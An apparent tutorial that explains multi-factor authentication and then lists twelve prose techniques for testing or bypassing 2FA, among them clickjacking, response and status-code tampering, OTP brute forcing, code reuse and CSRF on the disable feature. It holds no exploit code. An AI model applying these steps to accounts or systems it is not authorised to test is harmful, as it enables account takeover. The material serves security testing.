What is Multi-Factor Authentication?
Multi-factor authentication (MFA) is a security process that requires users to provide two or more forms of identification before they can access an account or system. It adds an extra layer of protection beyond just a username and password, making it significantly more difficult for unauthorized users to gain access.
Typically, MFA involves the following factors:
1: Something You Know
This is usually a password or a PIN that only the user should know. It’s the traditional authentication method used in most systems.
2: Something You Have
This could be a physical device, such as a smartphone, a smart card, or a hardware token, which generates a one-time code or a digital certificate.
3: Something you are
This refers to biometric factors such as fingerprint scans, facial recognition, or iris scans. Biometric authentication adds an additional layer of security by verifying unique physical characteristics.
By combining two or more of these factors, MFA significantly enhances security compared to relying solely on passwords, which can be vulnerable to various threats like phishing, brute-force attacks, or credential theft.
Can we Bypass the Multi-Factor Authentication?
Yes, we can Bypass 2FA in many ways.
MFA Bypass Techniques
Technique 1: Clickjacking on MFA/2FA Disable Functionality
Embed the Page: Put the page where users can turn off Multi-Factor Authentication (MFA) or Two-Factor Authentication (2FA) into an iframe.
Trick the User: If you successfully embed the page, try to trick the user into turning off these security features using a social engineering trick.
Technique 2: 2FA Code Leakage in Response
Capture the Request: When a request is made to trigger the Two-Factor Authentication (2FA) code, like sending an OTP (One-Time Password), intercept and record this request.
Analyze the Response: Check the response to this request to see if the 2FA code is exposed or leaked in any way.
Technique 3: Response Manipulation
Inspect the response: Look at the response received after sending the Two-Factor Authentication (2FA) request.
Check for “Success”:false: See if the response indicates that the 2FA request was not successful.
Modify “Success” status: Change the “Success” status from false to true in the response to see if it allows bypassing the 2FA. This can be done manually or by using Burp Match & Replace Rules to automate the process.
Technique 4: JS File Analysis
Trigger the 2FA code request: When you’re trying to get the Two-Factor Authentication (2FA) code, start the process.
Look at the JavaScript (JS) files: Check all the JS files mentioned in the response you get back.
Search for bypass clues: See if any of these JS files have information that might help you bypass the 2FA code.
Technique 5: Status Code Manipulation
Check the Response Status Code: Look at the status code in the response, such as 401 or 402, which are in the 4XX range.
Modify the Status Code: If it’s a 4XX code, change it to “200 OK” and see if this action allows you to bypass the Two-Factor Authentication (2FA).
Technique 6: Lack of Brute-Force Protection
Request 2FA code and record it: Start by asking for the Two-Factor Authentication (2FA) code and keep track of this request.
Repeat the request multiple times: Try sending the same request 100-200 times. If there’s no limit stopping you, it indicates a problem with rate limits.
Test 2FA code validity: When you reach the page where you need to enter the 2FA code, try different combinations to see if you can guess a valid code. This is called brute-forcing.
Explore simultaneous actions: Experiment by simultaneously requesting OTPs on one side and attempting brute-force on the other. Eventually, you might find a match in the middle, providing a quick result.
Technique 7: 2FA Code Reusability
Request and use a 2FA code: Start by asking for a Two-Factor Authentication (2FA) code and use it for authentication.
Attempt to reuse the same 2FA code: Try using the same 2FA code again. If it works a second time, there’s a problem.
Test code expiration: Request multiple 2FA codes and observe if previously requested codes become invalid when a new code is requested.
Test code reuse after a long time: Try reusing a previously used code after a considerable duration, like a day or more. If it still works, it’s a potential issue since it suggests the code is susceptible to being guessed or cracked within that timeframe.
Technique 8: Password Reset/Email Change –2FA Disable
Perform email change or password reset: Imagine you can change the email address associated with the victim’s account or reset their password, either by your actions or by convincing the victim to do it.
2FA is turned off after email or password change: After the email is changed or the password is reset, the Two-Factor Authentication (2FA) is automatically disabled. While this might not be a problem for all organizations, it could pose an issue depending on the specific circumstances of each case.
Technique 9: CSRF on 2FA Disable Feature
Go to the 2FA settings page and select “Disable”: Access the Two-Factor Authentication (2FA) settings page and choose the option to disable it. Use Burp Suite to capture this action and create a CSRF (Cross-Site Request Forgery) Proof of Concept (PoC).
Send the PoC to the victim: Share the CSRF PoC with the victim user and verify if the CSRF successfully triggers, leading to the removal of 2FA from their account.
Technique 10: Missing 2FA Code Integrity Validation
Get a 2FA code from the Attacker Account: Start by obtaining a valid Two-Factor Authentication (2FA) code from the Attacker Account.
Try using this code in the victim’s 2FA request: Attempt to use the obtained 2FA code in the victim’s 2FA request to check if it successfully bypasses the 2FA protection.
Technique 11: Backup Code Abuse
Apply the same methods used for Two-Factor Authentication (2FA) like manipulating response/status codes and brute-forcing to bypass Backup Codes and deactivate/reset 2FA.
Technique 12: Direct Request
Skip directly to the page that comes after Two-Factor Authentication (2FA) or any other authenticated page of the application.
Check if this bypasses the 2FA restrictions and grants access without requiring additional authentication steps.
